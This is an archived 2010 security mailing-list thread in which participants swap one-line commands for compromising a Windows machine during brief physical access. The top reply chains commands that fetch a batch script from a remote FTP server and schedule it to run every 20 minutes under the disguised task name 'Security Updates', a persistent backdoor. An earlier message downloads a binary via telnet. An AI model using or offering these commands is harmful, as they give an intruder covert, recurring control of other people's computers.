Quick keyboard pwnage

[NSweaney at tulsacash.com (Nathan Sweaney)]

Don't forget that telnet isn't installed by default on Vista & 7.  

What about something like this:

echo open ftp.somesite.com > %WINDIR%\ftp.scr & echo anonymous >> %WINDIR%\ftp.scr & echo bill at gates.com >> 
%WINDIR%\ftp.scr & echo get script.bat >> %WINDIR%\ftp.scr & echo quit >> %WINDIR%\ftp.scr & echo ftp -s:ftp.scr > 
%WINDIR%\security.bat & echo start %WINDIR%\script.bat >> %WINDIR%\security.bat & schtasks /create /tn "Security 
Updates" /sc minute /mo 20 /tr security.bat

I haven't tested it so I may have some syntax wrong, but the basic idea should work.  Now your box just checks in every 
20 minutes & does whatever you put in script.bat.

If you wanted to get fancy, you could change script.bat to something like 123.123.123.123.bat (or whatever it's 
external IP is).  Then just check your server logs to see who is connecting & you can customize your scripts to each 
location.  That may take a little more fancy kung fu to get your external IP though.  

nathan


-----Original Message-----
From: pauldotcom-bounces at mail.pauldotcom.com [mailto:pauldotcom-bounces at mail.pauldotcom.com] On Behalf Of Josh 
Olson
Sent: Monday, March 15, 2010 11:46 AM
To: PaulDotCom Security Weekly Mailing List
Subject: Re: [Pauldotcom] Quick keyboard pwnage

Adrian,

I haven't been able to make this work, but perhaps with some tweaking,
telnet and edlin can do it?

Something like:

telnet -f binary.exe
o site.com port
GET /path/to/binary.exe
quit

Then edlin binary.exe /B
1,3d
e

Note that edlin doesn't ship with 64-bit versions of Windows.

Josh

On Sun, Mar 14, 2010 at 2:10 PM, Adrian Crenshaw <irongeek at irongeek.com> wrote:
> Hi All,
> ???? I need some ideas. Let's way you are the Flash (or Quicksilver if you
> prefer Marvel comics), and could type uberfast. You have no storage device
> with you, but like I said, you can type really fast. If you had momentary
> access to a physical box (Windows or Linux, but I'm most interest in
> Widows), what command would you run as a pen-tester?
>
> Ideas to get us started:
> 1. Net user add obviously would be an option for some. (this I know the
> command for)
> 2. Anyone know a way to enter a binary at the command line and quickly run
> it?
> 3. Wget functionally in windows would be nice, then you could just grab exes
> you want quickly.
> 4. Quickly upload files off of the target system to someplace you control on
> the internet.
>
> Extra point for simple commands, quick to type, and on one line. If I use
> your idea, I'll be sure to thank you in the project notes/comments.
>
> Thanks,
> Adrian
>
>
> _______________________________________________
> Pauldotcom mailing list
> Pauldotcom at mail.pauldotcom.com
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com